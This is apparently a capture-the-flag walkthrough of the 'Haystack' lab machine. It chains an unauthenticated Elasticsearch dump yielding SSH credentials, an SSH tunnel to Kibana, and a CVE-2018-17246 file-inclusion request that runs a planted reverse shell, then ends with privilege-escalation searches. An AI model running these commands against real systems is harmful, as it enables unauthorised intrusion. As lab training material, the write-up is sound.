# Haystack

Port scan of the target (SYN scan, no host discovery, grepable output saved to `allPorts`):

~~~
nmap -sS -Pn --min-rate 5000 10.10.10.115 -oG allPorts
~~~

![](https://i.imgur.com/YDYSVyk.png)

### Port 80

![](https://i.imgur.com/vmgqw4B.png)
![](https://i.imgur.com/QNdcimF.png)
![](https://i.imgur.com/r8FZpkF.png)

The image served by the web server, `index.jpeg`, is downloaded and checked for embedded metadata and strings:

~~~
exiftool index.jpeg
~~~

![](https://i.imgur.com/DCKSuyZ.png)

~~~
strings index.jpeg
~~~

![](https://i.imgur.com/7rNsRu9.png)
![](https://i.imgur.com/YCoTatw.png)

The hint hidden in the image's strings output gives the keyword that is searched for in the Elasticsearch index below.

### Port 9200

![](https://i.imgur.com/WPDQzS9.png)

Port 9200 is Elasticsearch and it answers unauthenticated HTTP requests, so its REST API is enumerated directly (`_cat` lists the available cat endpoints):

~~~
curl -s -X GET "http://10.10.10.115:9200/_cluster"
curl -s -X GET "http://10.10.10.115:9200/_security"
curl -s -X GET "http://10.10.10.115:9200/_cat"
curl -s -X GET "10.10.10.115:9200/_cat" ; echo
~~~

![](https://i.imgur.com/g6WrgVH.png)

List the indices:

~~~
curl -s -X GET "http://10.10.10.115:9200/_cat/indices?v" ; echo
~~~

![](https://i.imgur.com/fC81Wat.png)

Mapping and settings of the `quotes` index:

~~~
curl -s -X GET "http://10.10.10.115:9200/quotes" | jq
~~~

![](https://i.imgur.com/H2ko8lZ.png)

Documents of the `bank` index:

~~~
curl -s -X GET "http://10.10.10.115:9200/bank/_search?pretty=true" | jq
~~~

![](https://i.imgur.com/9HNeuYZ.png)

`_search` returns only 10 hits by default. `size=10000` (the default `index.max_result_window`, the largest page a plain search can return) dumps the whole `quotes` index, which is then grepped for the keyword from the image:

~~~
curl -s -X GET "http://10.10.10.115:9200/quotes/_search?pretty=true&size=10000" | jq | grep "clave"
~~~

![](https://i.imgur.com/UXknA2r.png)
![](https://i.imgur.com/G9XRGZc.png)

Credentials obtained from the matching documents: user `security`, password `spanish.is.key`.

### Port 22

![](https://i.imgur.com/8RiYy8r.png)

The credentials work over SSH as the user `security`.

## Reconnaissance inside the target

#### Open ports on the machine

~~~
netstat -nat
ss -nltp
~~~

![](https://i.imgur.com/HswvO5j.png)

#### 5601 - Kibana

![](https://i.imgur.com/74DkvdK.png)

Kibana is listening on port 5601 bound to localhost only, so it cannot be reached from the attacking machine directly; it is exposed through an SSH tunnel.

#### Local Port Forwarding

Before:

![](https://i.imgur.com/ssFmzrq.png)

Now:

~~~
ssh security@10.10.10.115 -L 5601:localhost:5601
~~~

`-L 5601:localhost:5601` binds port 5601 on the attacking machine and forwards every connection to it through the SSH session to `localhost:5601` on the target, so Kibana can be browsed at `http://localhost:5601`.

![](https://i.imgur.com/6p0npXv.png)
![](https://i.imgur.com/v4N6nj4.png)

### Kibana

![](https://i.imgur.com/pzy3MCJ.png)

#### CVE-2018-17246

![](https://i.imgur.com/J1hAxQu.png)
![](https://i.imgur.com/UN8XyQo.png)
![](https://i.imgur.com/CY3Jd1E.png)
![](https://i.imgur.com/NqaSB7O.png)

CVE-2018-17246 is a local file inclusion in the Console plugin of Kibana before 6.4.3 and 5.6.13: the `apis` parameter of `/api/console/api_server` is passed to `require()` without sanitisation, so a path traversal makes the Kibana Node.js process load and execute any JavaScript file on disk. A JavaScript reverse shell is placed in `/tmp/shell.js` through the SSH session as `security` (a path the `security` user can write to), and the request below, sent through the tunnel, makes Kibana execute it as the `kibana` user. The `.../` component in the middle of the traversal comes from the published proof of concept; path normalisation cancels it against the following `..`, so it is harmless:

~~~
curl -s -X GET "http://localhost:5601/api/console/api_server?sense_version=@@SENSE_VERSION&apis=../../../../../../.../../../../tmp/shell.js"
~~~

#### STTY

Upgrade the reverse shell to an interactive TTY (then background it with Ctrl-Z, run `stty raw -echo; fg` locally and `reset` in the shell):

~~~
python -c 'import pty;pty.spawn("/bin/bash")'
~~~

![](https://i.imgur.com/FyOegqT.png)

### File search

Look for SUID binaries and for files owned by the `kibana` user:

~~~
find / -perm -4000 2>/dev/null
find / -user kibana 2>/dev/null
~~~

![](https://i.imgur.com/4bKbGwe.png)

Files executed by root:

![](https://i.imgur.com/yONLXuB.png)
![](https://i.imgur.com/1fxaM1t.png)
![](https://i.imgur.com/QUdJ0Zd.png)
![](https://i.imgur.com/Z8uVQc7.png)